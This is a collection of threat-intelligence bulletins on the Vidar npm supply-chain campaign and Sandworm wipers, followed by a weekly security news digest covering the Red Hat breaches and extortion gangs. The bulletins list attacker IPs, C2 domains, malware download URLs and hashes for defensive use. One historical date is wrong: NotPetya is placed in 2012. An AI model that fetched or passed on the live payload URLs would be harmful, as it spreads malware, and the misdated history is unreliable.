Immediately investigate any systems using Siemens S7 PLCs for unexplained application crashes or communication failures, as these may be symptoms of the Sharp7Extend malware.
Compliance Best Practices
Establish a formal policy and process for vetting and approving all third-party software dependencies, including NuGet packages, before they are permitted for use in production code. Implement a private, internal package repository to host only vetted and approved third-party dependencies, and configure developer environments to use this repository as the primary source. Implement tooling and processes to generate and maintain a Software Bill of Materials (SBOM) for all developed and deployed applications to enable rapid dependency auditing. Develop and implement a recurring security training program for all developers focusing on software supply chain risks, including how to identify typosquatting and vet open-source package publishers. Review and enhance network segmentation to ensure that Operational Technology (OT) networks, especially those with PLCs, are isolated from the corporate IT network to prevent cross-domain compromises.

MUT-4831 Deploys Vidar Infostealer via 17 Malicious npm Packages Targeting Windows
A sophisticated supply chain attack, attributed to the MUT-4831 threat actor cluster, targeted the npm ecosystem with 17 malicious packages across 23 releases, designed to deploy the Vidar v2 infostealer malware on Windows systems. Discovered by Datadog Security Research on October 21, 2025, these packages, masquerading as legitimate SDKs and libraries, remained active for approximately two weeks, accumulating over 2,240 downloads, with `react-icon-pkg` alone accounting for 503. The attack chain involved postinstall scripts downloading an encrypted ZIP archive from `bullethost[.]cloud`, decrypting it, and executing a Windows PE binary named `bridle.exe`.
This Go-compiled Vidar variant aggressively harvests sensitive data, including browser credentials, cookies, and cryptocurrency wallets, exfiltrating it after dynamically discovering command-and-control servers via hardcoded Telegram and Steam accounts, then deleting all traces from the compromised system.

Severity: Critical

Sources
https://buaq.net/go-374147.html
https://cyberinsider.com/vidar-stealer-2-0-marks-major-evolution-in-infostealer-landscape/
https://cyberpress.org/vidar-malware-analysis/
https://cyberpress.org/weaponized-npm-packages/
https://gbhackers.com/malicious-npm-packages/
https://www.techradar.com/pro/point-of-use-theft-vidars-shift-to-api-level-interception
https://www.trendmicro.com/en_us/research/25/j/how-vidar-stealer-2-upgrades-infostealer-capabilities.html

Threat Details and IOCs
Malware: Arkei, Arkei Stealer, ArkeiStealer, Lumma, LummaC2, Lumma Stealer, Mohazo, Raccoon Stealer, Racealer, RedLine, RedLine Stealer, Spyware.Vidar, StealC, Vidar, Vidar Stealer
CVEs: CVE-2023-20118, CVE-2025-34090
Technologies: Amazon Web Services, Apple macOS, Discord, FileZilla, Google Chrome, Microsoft 365, Microsoft Azure, Microsoft Edge, Microsoft Visual Studio, Microsoft Windows, Monero, Mozilla Firefox, Node.js, npm, Opera, Pale Moon, React, Steam, Telegram, Vivaldi, Waterfox, WinSCP
Threat Actors: AngryLikho, Bitter, Loadbaks, MUT4831, Storm-2477, WaterKurita
Attacker Countries: Azerbaijan, Moldova, Russia
Attacker IPs: 65.100.80.190, 65.108.80.90
Attacker Emails: aartrabens@gmail.com, saliii229911@gmail.com
Attacker Domains: a.t.rizbegadget.shop, bullethost.cloud, cvt.technicalprorj.xyz, files.catbox.moe, ftp.nadimgadget.shop, gor.technicalprorj.xyz, gra.khabeir.com, gra.nadimgadget.shop, gz.technicalprorj.xyz, iu.server24x.com, mas.to, nv.d.khabeir.com, p.x.rizbegadget.shop, steamcommunity.com, stg.mistonecorp.net, stg.server24.com, stg.server24x.com, telegram.me, t.y.server24x.com, upload.bullethost.cloud
Attacker URLs: https://files.catbox.moe/awktpw.zip, https://nv.d.khabeir.com, https://steamcommunity.com/profiles/76561198777118079, https://telegram.me/s/sre22qe, https://upload.bullethost.cloud/download/68f5503834645ddd64ba3e17, https://upload.bullethost.cloud/download/68f55d7834645ddd64ba3e3e, https://upload.bullethost.cloud/download/68f775f734645ddd64ba99f4, https://upload.bullethost.cloud/download/68f77d1134645ddd64ba9a5e, https://upload.bullethost.cloud/download/68f7b14734645ddd64ba9b6e, https://upload.bullethost.cloud/download/68f7c68a34645ddd64ba9b9d, https://upload.bullethost.cloud/download/68f7de3834645ddd64ba9c00, hxxp://mas.to/@oleg98, hxxps://steamcommunity.com/profiles/76561198780411257
Attacker Hashes: 0e90c63363265f75f8637c1a3e9ec277a1ea1a8436dd7561fff59cfb722c6612, 1230f3382910e84d542d64e859fb3064958b47bc50508045cbb5b597b987c65b, 12934992bb65953861b4dfd7a67d3256eae8da19ee86609aa29b68fb77258e98, 1eff512c9b003b08464e071774bd85e43464cce6ad1373463b1f67683d03b956, 288ecc39cdde51783dbb171758ec760652bb929ad17d239a43629449a22429c1, 29b6a1c08e96ce714f9e1f54a4edde3f5e6b41477db5f89f1bd41d931508bdbf, 37d62d7983f7e0012f88e81ba28ad02a839b4d8804851a401b19058ca8cc2cf4, 3dc09740ded920e5899a5386c6731de0c89d6bd182fb89073e910b619980899f, 5f68157e486413ab276fad629d7af21a53b399c5fa8b1a0cfbd37851ceca0381, 8934056f93516a33c4e9eeb2f50aea160860cf229ca6f6ec302bd2c404ebfe59, 95368954efa9618c586bdd8978f41f465450caf268d07ca316cf6975f6e15848, aa49d14ddd6c0c24febab8dce52ce3835eb1c9280738978da70b1eae0d718925, bcf8a6911bf4033cf4d55caf22d7da9d97275bbb3b0f8fefd1129e86bd4b49f8
Victim Industries: Business Services, Cloud Infrastructure, Cryptocurrency, Education, Financial Services, Gaming, Government, Healthcare, Information Technology, Manufacturing, Real Estate, Retail, Social Media, Software, Sports and Entertainment, Technology Hardware, Utilities

Mitigation Advice
Add the domain `bullethost[.]cloud` to the network firewall and DNS blocklists to prevent connections to the malware distribution server.
Use EDR or system scanning tools to search all Windows endpoints and servers for the file `bridle.exe` to identify potential infections.
Instruct developers to immediately audit all project `package.json` and lock files for dependencies named `custom-tg-bot-plan` or `react-icon-pkg`, and for any packages published by the npm users `aartje` and `saliii229911`.
Review network logs for unusual outbound connections from developer workstations or build servers to Telegram or Steam APIs, since this Vidar variant uses those services to discover its C2 servers.

Compliance Best Practices
Establish a new security policy to disable automatic execution of npm `postinstall` scripts by default using the `--ignore-scripts` flag, and create a process to vet and explicitly allow scripts only for trusted packages.
Deploy a private npm registry or a caching proxy, such as Sonatype Nexus or JFrog Artifactory, to host only vetted and approved third-party packages for internal developer use.
Integrate a Software Composition Analysis (SCA) tool into the CI/CD pipeline to automatically scan npm packages for known vulnerabilities and malicious code signatures on every build.
Enforce a policy requiring all projects to use lockfiles (e.g., `package-lock.json`) and mandate the use of `npm ci` instead of `npm install` in all automated build environments to ensure reproducible and vetted dependency installation.
On all Windows developer workstations and build servers, enable PowerShell Script Block Logging and Module Logging and forward the logs to your SIEM for analysis.
Configure the PowerShell execution policy on all Windows developer workstations and build servers to `RemoteSigned` or stricter via Group Policy to prevent the execution of unsigned, untrusted scripts.
Sandworm (GRU) Wiper Attacks Target Ukraine's Critical Infrastructure

Russian state-controlled Sandworm, identified as part of the GRU, has consistently deployed destructive wiper malware against Ukraine, with recent attacks reported in April, June, and September. These attacks targeted a Ukrainian university with Sting and Zerlot wipers, and later expanded to critical infrastructure, including government, energy, logistics, and notably, the grain industry, aiming to weaken the country's war economy. This continues a pattern of Russian cyber warfare, which previously included the NotPetya worm in 2012, attacks on Ukraine's electricity grid in 2016-2017, and 2022 incidents affecting satellite modems and a Kyiv TV station, alongside other wipers like WhisperGate. Other Russian-aligned groups like RomCom, which exploited a WinRar zero-day, and Gamaredon have also conducted wiper attacks, with UAC-0099 sometimes providing initial access through spear phishing, underscoring wipers' enduring role as a preferred tool for Russian threat actors.
Severity: Critical

Sources
https://arstechnica.com/security/2025/11/wipers-from-russias-most-cut-throat-hackers-rain-destruction-on-ukraine/
https://buaq.net/go-372169.html
https://buaq.net/go-372777.html
https://buaq.net/go-373967.html
https://cyberpress.org/russian-hackers-2/
https://cyberpress.org/weaponized-zip-documents/
https://gbhackers.com/living-off-the-land-tactics/
https://gbhackers.com/ssh-tor-backdoor/
https://industrialcyber.co/ransomware/sandworm-linked-webshell-and-lotl-tactics-found-in-russian-cyberattacks-targeting-ukrainian-networks/
https://securityonline.info/russian-apts-exploit-lotl-techniques-in-ukraine-cyber-attacks-deploying-sandworm-linked-webshell-and-credential-dumping/
https://securityonline.info/sandworm-apt-attacks-belarus-military-with-lnk-exploit-and-openssh-over-tor-obfs4-backdoor/
https://socprime.com/blog/russian-hackers-target-ukrainian-organizations/
https://thehackernews.com/2025/10/russian-hackers-target-ukrainian.html
https://thehackernews.com/2025/11/trojanized-eset-installers-drop.html
https://www.bleepingcomputer.com/news/security/sandworm-hackers-use-data-wipers-to-disrupt-ukraines-grain-sector/
https://www.esecurityplanet.com/threats/russian-linked-cyberattacks-continue-to-target-ukrainian-organizations/
https://www.helpnetsecurity.com/2025/11/03/russian-belarusian-military-spear-phishing/
https://www.hendryadrian.com/living-off-the-land-allowed-russia-linked-group-to-breach-ukrainian-entities-this-summer/
https://www.hendryadrian.com/ukrainian-organizations-still-heavily-targeted-by-russian-attacks/
https://www.metacurity.com/cisa-plans-to-fire-54-employees-despite-court-injunction/
https://www.securityweek.com/destructive-russian-cyberattacks-on-ukraine-expand-to-grain-sector/

Threat Details and IOCs
Malware: Acid Pour, AcidPour, AcidRain, BACKORDER, BE2, BE3, Black Energy, BlackEnergy, Blakken, BPFDoor, CaddyWiper, Chisel, CRASHOVERRIDE, Diskcoder.C, EternalPetya, ExPetr, FoxBlade, FruitShell, GoldenEye, GootKit Loader, GootLoader, HermeticWiper, Industroyer, IsaacWiper, Kalambur, KillDisk, LAMEHUG, Localolive, LocalOlive, NEARMISS, NotPetya, Nyetna, Nyetya, NyetYa, PathWiper, PEAPOD, Petna, Petya 2.0, Petya.A, Pnyetya, PromptSteal, Pterodo, PteroPSDoor, PteroVDoor, QuietVault, RomCom, RomCom RAT, RomCom RAT 5.0, RustyClaw, SingleCamper, SnipBot, Sting, SUMBUR, VPNFilter, WhisperGate, Zerlot, Zerolot, ZeroLot, ZEROLOT
CVEs: CVE-2013-3906, CVE-2014-4114, CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, CVE-2017-0148, CVE-2017-0199, CVE-2019-10149, CVE-2021-32648, CVE-2021-34473, CVE-2022-41352, CVE-2023-23397, CVE-2023-32315, CVE-2023-32784, CVE-2023-42793, CVE-2023-48788, CVE-2024-1709, CVE-2025-53770, CVE-2025-8088
Technologies: ESET Endpoint Security, KeePass, Linux, Microsoft Active Directory, Microsoft Internet Information Services, Microsoft Windows, MikroTik RouterOS, MikroTik WinBox, OpenSSH, Python, RARLAB WinRAR, SonicWall Secure Mobile Access, Tor
Threat Actors: Actinium, AngryLikho, APT28, APT44, AquaBlizzard, Armageddon, AwakenLikho, BlackEnergy, CoreWerewolf, DEV-0861, EarthBluecrow, ELECTRUM, FROZENBARENTS, Gamaredon, InedibleOchotense, IRIDIUM, IronTilden, IRONVIKING, MuddyWater, PrimitiveBear, Quedagh, RedMenshen, RomCom, Sandworm, SeashellBlizzard, Shuckworm, StickyWerewolf, Storm-0978, Storm0978, TA450, TA453, TA455, Telebots, TridentUrsa, TropicalScorpius, Turla, UAC0002, UAC-0010, UAC0010, UAC-0082, UAC0082, UAC-0099, UAC0113, UAC-0125, UAC0125, Uac0145, UNC2565, UNC2596, UNC530, Unit74455, UNKSmudgedSerpent, VoidRabisu, VoodooBear, Winterflounder
Attacker Countries: China, Iran, Myanmar, North Korea, Russia
Attacker IPs: 156.67.24.239, 185.145.245.209, 77.20.116.133
Attacker Domains: ciscoheartbeat.com, eliteheirs.org, esetremover.com, esetscanner.com, esetsmart.com, melamorri.com, taibdsgqlwvnizgipp4sn7xee72qys3pufih3rjzhx3e5b5t245kafid.onion, yuknkap4im65njr3tlprnpqwj4h7aal4hrn2tdieg75rpp6fx25hqbyd.onion
Attacker URLs: 185.145.245.209:22065/service.aspx
Attacker Hashes: 08db5bb9812f49f9394fd724b9196c7dc2f61b5ba1644da65db95ab6e430c92b, 30a5df544f4a838f9c7ce34377ed2668e0ba22cc39d1e26b303781153808a2c4, 44b1f3f06607cd3ee16517d31b30208910ce678cb69ba7a0514546dff183dfce, 5d3a6340691840d1a87bfab543faec77b4a9d457991dd938834de820a99685f7, 636e04f0618dd578d107f440b1cf6c910502d160130adae5e415b2dd2b36abcb, 70a5492db39585ec18de512058a5389c9a4043fba13ca8ad7d057ead66298626, 710e8c96875d6a3c1b4f08f4b2094c800658551065b20ef3fd450b210dcc7b9a, 7269b4bc6b3036e5a2f8c2a7908a439202cee9c8b9e50b67c786c39f2500df8f, 7946a2275c1c232eebed6ead95ea4723285950175586db1f95354b910b0a3cce, 821362a484908e93f8ba748b600665ae6444303d, 8c07c37ac84d4c6fd76de3d966e26b65e401bc641a845baf6f73ad0d6a10fc6b, 99ec6437f74eec19e33c1a0b4ac8826bcc44848f87cd1a1c2b379fae9df62de9, 9f3d8252e8f3169751a705151bdf675ac194bfd8457cbe08e1f3c17d7e9e9be2, a0eed0e1ef8fc4129f630e6f68c29c357c717df0fe352961e92e7f8c93e5371b, a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92, b701272e20db5e485fe8b4f480ed05bcdba88c386d44dc4a17fe9a7b6b9c026b, ba5f7e2fa9be1cb3fc7ae113f41c36e4f2c464b6, c853d91501111a873a027bd3b9b4dab9dd940e89fcfec51efbb6f0db0ba6687b, cbb94dd87c3ce335c75e57621412eedce013fcc77ac92ec57f7e74ac70dde119, cf8e09f013fcb5f34c8c274bf07d9047956ba441dabf2d3de87ea025e14058b7, e03b8c54ac916b363f956e4e4e04a19eb4119455d8006c92e9328e16a8cee52f
Victim Industries: Agriculture, Automotive, Business Services, Critical Manufacturing, Defense, Digital Media, Education, Energy, Engineering, Financial Services, Government, Hospitality, Information Technology, Legal and Professional Services, Logistics, Manufacturing, Professional Services, Retail, Telecommunications, Transportation, Transportation & Logistics, Utilities
Victim Countries: Austria, Belarus, Belgium, Bulgaria, Canada, China, Croatia, Cyprus, Czech Republic, Denmark, Estonia, Finland, France, Germany, Greece, Hungary, Ireland, Israel, Italy, Latvia, Lithuania, Luxembourg, Malta, Myanmar, Netherlands, Norway, Poland, Portugal, Romania, Russia, Slovakia, Slovenia, South Korea, Spain, Sweden, Ukraine, United States

Mitigation Advice
Use endpoint management or scripting tools to scan all Windows systems for a scheduled task named "DavaniGulyashaSdeshka" and alert on or remove any findings.
Identify all installations of WinRar in the environment and ensure they are updated to a version that is not vulnerable to the zero-day exploit mentioned.
Configure email security gateways to block or quarantine emails from external sources that contain executable files or compressed archives like .rar and .zip.
Scan the network to identify all systems running SMBv1 and disable the protocol wherever it is not essential for business operations.

Compliance Best Practices
Implement and regularly test a 3-2-1 backup strategy, ensuring at least one copy of critical data is stored offline, air-gapped, or in an immutable storage repository to protect it from wiper malware.
Develop and roll out a continuous security awareness training program that includes phishing simulations to educate employees on how to identify and report suspicious emails.
Implement network segmentation to create isolated zones for critical servers and services, restricting communication paths from user workstations to limit the lateral movement of malware.
Deploy an application control or allowlisting solution on endpoints, particularly servers, to restrict software execution to only known and approved applications.

Red Hat in the news, £5.5B in Bitcoin recovered from scammer, more Breaches
Hello! ArvinF is your editor of the F5 SIRT This Week in Security, covering 28 September to 4 October 2025.

This week, Red Hat is in the news for their Consulting GitLab instance breach and an "Important" rated vulnerability in their OpenShift AI Service product. A win: the UK's Metropolitan Police have arrested a scammer and recovered £5.5B (!) in Bitcoin. Then came the breach disclosures from Allianz, WestJet, Motility and a "US tech company". Finally, the ransomware and extortion gangs: Scattered LAPSUS$ Hunters holding 1B Salesforce records under ransom, and Radiant Group's extortion attempt getting slammed by another extortion group. Let's get to it!

Red Hat's Consulting GitLab instance has been breached by an extortion group named Crimson Collective. The group initially bragged about the breach on Telegram, showing file listings and other sensitive data in Customer Engagement Reports (CERs) related to Red Hat customers' environments. Red Hat published a security incident advisory:

"We recently detected unauthorized access to a GitLab instance used for internal Red Hat Consulting collaboration in select engagements. Upon detection, we promptly launched a thorough investigation, removed the unauthorized party's access, isolated the instance, and contacted the appropriate authorities. Our investigation, which is ongoing, found that an unauthorized third party had accessed and copied some data from this instance."

The Crimson Collective threat group notes that they found authentication tokens inside these repos and have "already used these to compromise downstream Red Hat customers." An advisory from the Belgian government rates the incident "High Risk" for Belgian organizations, with "potential supply chain impact if service providers or IT partners worked with Red Hat Consulting". The same advisory provides these recommendations:
Revoke & Rotate all tokens, keys, and credentials shared with Red Hat or used in integrations.
Engage Third-Parties: ask your IT providers or partners whether they have used Red Hat Consulting and assess your potential exposure.
Contact Red Hat for guidance on your specific exposure.
Increase monitoring of authentication events, API calls, and system access for anomalies.

https://www.theregister.com/2025/10/03/red_hat_gitlab_breach/
https://www.redhat.com/en/blog/security-update-incident-related-red-hat-consulting-gitlab-instance
https://www.theregister.com/2025/10/02/cybercrims_claim_raid_on_28000/
https://ccb.belgium.be/news/hackers-crimson-collective-use-leaked-authentication-tokens-access-customer-systems

From standard user to Full Cluster Admin in Red Hat OpenShift AI Service via CVE-2025-10725

Red Hat OpenShift AI Service has a CVE, tracked as CVE-2025-10725, with a CVSS score of 9.9 out of 10; it narrowly misses 10 out of 10 only because it requires a low-privileged attacker.
https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

From the advisory:

"A flaw was found in Red Hat OpenShift AI Service. A low-privileged attacker with access to an authenticated account, for example as a data scientist using a standard Jupyter notebook, can escalate their privileges to a full cluster administrator. This allows for the complete compromise of the cluster's confidentiality, integrity, and availability. The attacker can steal sensitive data, disrupt all services, and take control of the underlying infrastructure, leading to a total breach of the platform and all applications hosted on it."

To resolve the vulnerability, upgrade to RHOAI 2.16.3, or, if Kueue features are not required, set the Kueue component management state to "Removed" in the RHOAI DataScienceCluster resource. For RHOAI 2.19+, a workaround is to prevent the RHOAI operator from managing the kueue-batch-user-rolebinding, then disable the ClusterRoleBinding by updating its subject to a different, non-existent group. Once updates providing fixes have been applied, it is recommended to remove the ClusterRoleBinding. This "Important" rated CVE came out at approximately the same time as the Red Hat Consulting GitLab breach.
https://www.theregister.com/2025/10/01/critical_red_hat_openshift_ai_bug/
https://access.redhat.com/security/cve/cve-2025-10725#cve-affected-packages

£5.5B in Bitcoin recovered from scammer

A scammer was caught by the London Metropolitan Police after a seven-year investigation, which also produced a record-busting Bitcoin seizure worth £5.5B. She "... carried out what the police describe as a 'large-scale fraud in China' between 2014 and 2017, and then attempted to launder the significant proceeds after arriving in the UK." The three-year fraud affected more than 128,000 people and netted 61,000 Bitcoin, which at current prices is worth more than £5.5 billion ($7.4 billion). At the point the crypto tokens were seized, they would have been worth around $404 million.

The scammer fled using false documents, entered the UK and attempted to launder the stolen money by buying property, said the Met. An associate helped in attempting to cash in on the laundering by buying properties in the UK and Dubai. This associate was caught last year and was jailed. The scammer may get additional time if they fail to pay up and return more than £3.1 million. The Crown Prosecution Service said the associate benefited by £3.5 million (c $4.7 million) from the fraud, led by the scammer, and the £3.1 million figure was the total sum of her available assets at the time. Reforms to crime legislation under the previous Conservative government aimed to make it easier for the UK authorities to seize, freeze and recover crypto assets. The changes would also allow some victims to apply for the release of their assets held in accounts.
https://www.theregister.com/2025/09/30/met_police_bitcoin_fraud/
https://www.bbc.com/news/articles/cy0415kk3rzo
https://news.met.police.uk/news/woman-convicted-following-worlds-largest-seizure-501569
https://www.gov.uk/government/news/new-powers-to-seize-cryptoassets-used-by-criminals-go-live

3.7M breach notification letters

The mailman and mail servers will be busy sending breach notification letters. From the Maine AG breach disclosure pages, the numbers of affected persons:
Insurance biz Allianz Life - 1,497,036
WestJet - 1.2 million
Motility - 766,670
From the news: "US tech company" - 250,000

The impact:
Allianz Life - the attackers accessed the data of the insurer's customers, staff, and financial professionals.
WestJet - the incident affected its online services and mobile app and exposed customer data that could include names, contact details, information and documents provided in connection with their reservation and travel, and data regarding victims'
Motility Software Solutions - "unauthorized actor deployed malware that encrypted a portion of our systems. Although the malware primarily restricted our access to internal data, the forensic evidence suggests that, before encryption, the actor may have removed limited files containing customers' personal data ... could include full names, home and email addresses, telephone numbers, dates of birth, SSNs, and driver's license numbers."

That's a lot of names, SSNs, CCs, email addresses, addresses and IDs. All three businesses offered identity protection and credit monitoring services: Allianz Life and WestJet two years of coverage, Motility 12 months.
https://www.theregister.com/2025/10/01/north_american_data_breaches/

Scattered LAPSUS$ Hunters 1B Salesforce Records under ransom

Scattered LAPSUS$ Hunters gave Salesforce until October 10 as a deadline to negotiate payment, or they will leak Salesforce customers' data.
Scattered LAPSUS$ Hunters is a coalition of three threat and ransomware groups, Scattered Spider, ShinyHunters and Lapsus$, that had a moment of solidarity "to break into businesses' networks, steal their data, and force an extortion payment." Per the Salesforce advisory:

"We are aware of recent extortion attempts by threat actors, which we have investigated in partnership with external experts and authorities," "Our findings indicate these attempts relate to past or unsubstantiated incidents, and we remain engaged with affected customers to provide support," "At this time, there is no indication that the Salesforce platform has been compromised, nor is this activity related to any known vulnerability in our technology."

In August 2025, there was the Salesloft Drift breach that affected Salesforce customers.
https://www.theregister.com/2025/10/03/scattered_lapsus_hunters_latest_leak/
https://www.theregister.com/2025/09/14/in_brief_infosec/
https://www.theregister.com/2025/09/08/drift_breach_entry_salesloft_github/
https://www.theregister.com/2025/08/12/scattered_spidershinyhunterslapsus_cybercrime_collab/
https://status.salesforce.com/generalmessages/20000224?locale=en-US

Radiant Group extortion gang crosses the line and gets schooled by other ransomware groups

Radiant Group stole data from Kido International, a school for young children with branches in the UK, US, and India. They then posted unblurred pictures of 10 children, along with their addresses, parents' names, and other personal data, and threatened to expose more if a ransom wasn't paid. Parents of some children claimed to have received threatening calls after Radiant published the data. London's Metropolitan Police investigators are following up on the case. But now, Radiant says it removed the child data it had posted after receiving pressure from other ransomware groups. It seems they crossed a line in the criminal world and backed down when called out for it.
Rebecca Taylor, a threat intelligence knowledge manager at security biz Sophos, tells The Register that the crew was called out by the well-established ransomware-as-a-service Nova gang on the Russian Anonymous Market Place (RAMP), an online souk for cybercriminals. One of Nova's affiliate members, going under the handle BlackBeard, told Radiant, "reputation important, don't attack child right." "We have disabled any attacks relating to them, is not allowed anymore," Radiant answered, and added, "Any data relating to under 18s who attended have been deleted." BlackBeard congratulated them and wished the extortionists good luck for the future, and Nova offered to help in future raids. Radiant claimed to have information on over 8,000 children enrolled at Kido, as well as their families, teachers, and staff. Taylor told The Register that the Radiant Group seem to be new script kiddies on the block who overstepped themselves and are now trying to make nice with the rest of the criminal community.
https://www.theregister.com/2025/10/02/ransomware_radiant_delete_kids_info/
https://www.theregister.com/2025/09/25/ransomware_gang_publishes_toddlers_images/
https://www.theguardian.com/technology/2025/oct/02/kido-nursery-hackers-say-they-have-deleted-stolen-data

Outro

The amount of breach news from this week was something: the leaked personal and financial information will surely be the foundation of future breaches and extortions. These breaches were perpetrated by ransomware and extortion gangs that utilized social engineering and known and unknown vulnerabilities in their campaigns. As defenders, we should advise our organizations to keep our systems updated, implement levels and layers of security defenses, and keep ourselves and our peers educated on good security practices. The silver lining is the recovery of the £5.5B worth of Bitcoin from scammers caught in the UK. The many victims of scammers have an opportunity to recover their lost assets.
Credit to the original sources and posts! I hope the news I picked is informative and educational. Till next time: Stay Safe and Secure! As always, if this is your first TWIS, you can always read past editions. We also encourage you to check out all of the content from the F5 SIRT.